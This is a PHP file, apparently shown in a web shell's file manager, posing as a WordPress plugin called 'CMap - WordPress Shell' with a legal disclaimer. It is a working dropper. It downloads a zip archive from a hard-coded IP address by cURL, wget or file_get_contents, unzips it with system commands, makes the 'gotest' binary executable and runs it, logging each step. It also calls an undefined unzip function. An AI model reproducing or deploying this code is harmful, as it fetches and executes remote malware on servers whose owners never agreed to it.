OwlCyberSecurity - MANAGER

Edit File: index.php

<?php
/**
 * Plugin Name: CMap - WordPress Shell
 * Plugin URI: https://github.com/mx/csmap/
 * Description: Simple WordPress Shell - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
 * Version: 1.2
 * Author: Cmap
 * Author URI: https://github.com/x/cmsmap/
 * License: GPLv55
 */

set_time_limit(0);

$zF = './gotest.zip';                
$dU = 'http://107.189.29.12:58081/gotest.zip'; 
$uD = './gotest_dir';               
$maxR = 3;                          
$t = 300;                           
$lF = './download_log.txt';

function lM($msg) {
    global $lF;
    $ts = date('Y-m-d H:i:s');
    file_put_contents($lF, "[$ts] $msg\n", FILE_APPEND);
}

function rFS($url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_NOBODY, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$data = curl_exec($ch);
    $sCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $size = curl_getinfo($ch, CURLINFO_CONTENT_LENGTH_DOWNLOAD);
    curl_close($ch);

if ($sCode == 200) {
        return $size;
    } else {
        return false;
    }
}

function dWC($url, $dest, $t) {
    lM("Downloading $url with cURL...");
    $fp = fopen($dest, 'w');
    if (!$fp) {
        lM("Failed to open $dest for writing.");
        return false;
    }

$ch = curl_init($url);
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_TIMEOUT, $t);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_FAILONERROR, true);
    
    $success = curl_exec($ch);
    $err = curl_error($ch);
    curl_close($ch);
    fclose($fp);

if ($success) {
        lM("Download successful with cURL: $dest");
        return true;
    } else {
        lM("Download failed with cURL: $err");
        return false;
    }
}

function dWW($url, $dest, $t) {
    lM("Downloading $url with wget...");
    $cmd = "wget --timeout=$t -O $dest $url";
    exec($cmd, $out, $status);

if ($status === 0) {
        lM("Download successful with wget: $dest");
        return true;
    } else {
        lM("Download failed with wget.");
        return false;
    }
}

function dFGC($url, $dest) {
    lM("Downloading $url with file_get_contents...");
    $data = file_get_contents($url);
    if ($data === false) {
        lM("Download failed with file_get_contents.");
        return false;
    }

$res = file_put_contents($dest, $data);
    if ($res === false) {
        lM("Failed to save the downloaded file: $dest");
        return false;
    }

lM("Download successful with file_get_contents: $dest");
    return true;
}

function dF($url, $dest, $t, $maxR) {
    for ($a = 0; $a < $maxR; $a++) {
        lM("Attempt " . ($a + 1) . " to download...");

if (dWC($url, $dest, $t)) {
            return true;
        }

if (dWW($url, $dest, $t)) {
            return true;
        }

if (dFGC($url, $dest)) {
            return true;
        }

lM("All download methods failed, retrying...");
        sleep(2);
    }

return false;
}

function uS($zipF, $dest) {
    lM("Unzipping $zipF using system command...");
    
    $cmd = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? 
           "powershell -Command \"Expand-Archive -Force -Path " . escapeshellarg($zipF) . " -DestinationPath " . escapeshellarg($dest) . "\"" :
           "unzip -o " . escapeshellarg($zipF) . " -d " . escapeshellarg($dest);

exec($cmd, $out, $status);
    if ($status === 0) {
        lM("Unzip successful.");
        return true;
    } else {
        lM("System command unzip failed.");
        return false;
    }
}

if (!file_exists($zF)) {
    lM("File $zF does not exist. Attempting to download...");
    if (!dF($dU, $zF, $t, $maxR)) {
        lM("Failed to download, exiting script.");
        exit;
    }
}

$rS = rFS($dU);
if (!$rS) {
    lM("Failed to retrieve remote file size.");
    exit;
}

$lS = file_exists($zF) ? filesize($zF) : 0;

if ($rS != $lS) {
    lM("File size mismatch. Redownloading...");
    unlink($zF);
    if (!dF($dU, $zF, $t, $maxR)) {
        lM("Failed to download correct file, exiting script.");
        exit;
    }
}

if (!is_dir($uD)) {
    mkdir($uD, 0755, true);
}

if (!uZ($zF, $uD)) {
    lM("ZipArchive unzip failed, trying system command...");
    if (!uS($zF, $uD)) {
        lM("Failed to unzip using both methods, exiting script.");
        exit;
    }
}

unlink($zF);
lM("Cleanup completed.");

$gP = $uD . '/gotest';

if (file_exists($gP)) {
    chmod($gP, 0755);
    lM("Executing gotest...");

exec($gP, $out, $status);
    lM("Execution output: " . implode("\n", $out));
    lM("Execution status: $status");

if ($status === 0) {
        lM("Successfully executed gotest.");
    } else {
        lM("Failed to execute gotest.");
    }
} else {
    lM("gotest file not found after extraction.");
}
?>